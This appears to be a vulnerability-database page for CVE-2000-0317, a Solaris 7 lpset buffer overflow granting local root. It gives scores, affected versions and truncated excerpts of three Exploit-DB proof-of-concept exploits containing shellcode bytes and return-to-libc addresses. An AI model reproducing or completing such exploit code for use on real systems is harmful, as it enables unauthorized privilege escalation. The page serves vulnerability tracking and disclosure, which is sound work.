CVE-2000-0317
published 2000-04-24CVE-2000-0317: Buffer overflow in Solaris 7 lpset allows local users to gain root privileges via a long -r option.
PriorityP425high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
1.22%
64.9th percentile
Buffer overflow in Solaris 7 lpset allows local users to gain root privileges via a long -r option.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sun | solaris | — | — |
| sun | solaris | — | — |
| sun | sunos | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Solaris 2.6/7.0 - 'lpset -r' Local Buffer Overflow (3)
exploitdb·2000-04-24
CVE-2000-0317 Solaris 2.6/7.0 - 'lpset -r' Local Buffer Overflow (3)
Solaris 2.6/7.0 - 'lpset -r' Local Buffer Overflow (3)
---
/*
source: https://www.securityfocus.com/bid/1138/info
A vulnerability exists in the handling of the -r option to the lpset program, as included in Solaris 7 from Sun Microsystems. The -r option is undocumented. As such, its use in unknown. However, when supplied a well crafted buffer containing executable code, it is possible to execute arbitrary commands as root.
*/
#define BASE 0xdff40000
#define STACK 0x8047e30
#define BUFSIZE 36
#define SYSTEM (BASE + 0x5b328)
#define SCANF (BASE + 0x5ae80)
#define SETUID (BASE + 0x30873)
#define PERCD (BASE + 0x83754)
#define BINSH (BASE + 0x83654)
#define POP3 (SYSTEM + 610)
#define POP2 (SYSTEM + 611)
#define POP1 (SYSTEM + 612)
int
main()
{
unsigned char expbuf[1024];
char *env[1];
i
Exploit-DB
Solaris 2.6/7.0 - 'lpset -r' Local Buffer Overflow (2)
exploitdb·2000-04-24
CVE-2000-0317 Solaris 2.6/7.0 - 'lpset -r' Local Buffer Overflow (2)
Solaris 2.6/7.0 - 'lpset -r' Local Buffer Overflow (2)
---
// source: https://www.securityfocus.com/bid/1138/info
A vulnerability exists in the handling of the -r option to the lpset program, as included in Solaris 7 from Sun Microsystems. The -r option is undocumented. As such, its use in unknown. However, when supplied a well crafted buffer containing executable code, it is possible to execute arbitrary commands as root.
#include
#include
#define BSIZE 18001
#define OFFSET 20112
#define START 700
#define END 1200
#define NOP 0xac15a16e
#define EXSTART 116
char sparc_shellcode[] =
/* setreuid(0,0) */
"\x82\x10\x20\x17\x90\x20\x60\x17\x92\x22\x40\x09\x91\xd0\x20\x08"
/* other stuff */
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
"\x92\x03\xa0\x08\x94\x1a\x80
Exploit-DB
Solaris 2.6/7.0 - 'lpset -r' Local Buffer Overflow (1)
exploitdb·2000-04-24
CVE-2000-0317 Solaris 2.6/7.0 - 'lpset -r' Local Buffer Overflow (1)
Solaris 2.6/7.0 - 'lpset -r' Local Buffer Overflow (1)
---
// source: https://www.securityfocus.com/bid/1138/info
A vulnerability exists in the handling of the -r option to the lpset program, as included in Solaris 7 from Sun Microsystems. The -r option is undocumented. As such, its use in unknown. However, when supplied a well crafted buffer containing executable code, it is possible to execute arbitrary commands as root.
/*
*
* solaris 2.7 lpset local exploit, i386.
* discovered by: duke
* not the same as on bt.
* if exploit dosen=B4t work try offset from 300-450
*
* greets: duke, #!ADM, #!security.is, #hax
*
* DiGiT - [email protected]
*
*/
#include
#include
#include
#include
char shellcode[] =
"\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
"\x88\x46\xb9\x88\x46\
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2000-04/0192.htmlhttp://archives.neohapsis.com/archives/bugtraq/2000-04/0236.htmlhttp://marc.info/?l=bugtraq&m=95729763119559&w=2http://www.securityfocus.com/bid/1138http://archives.neohapsis.com/archives/bugtraq/2000-04/0192.htmlhttp://archives.neohapsis.com/archives/bugtraq/2000-04/0236.htmlhttp://marc.info/?l=bugtraq&m=95729763119559&w=2http://www.securityfocus.com/bid/1138
2000-04-24
Published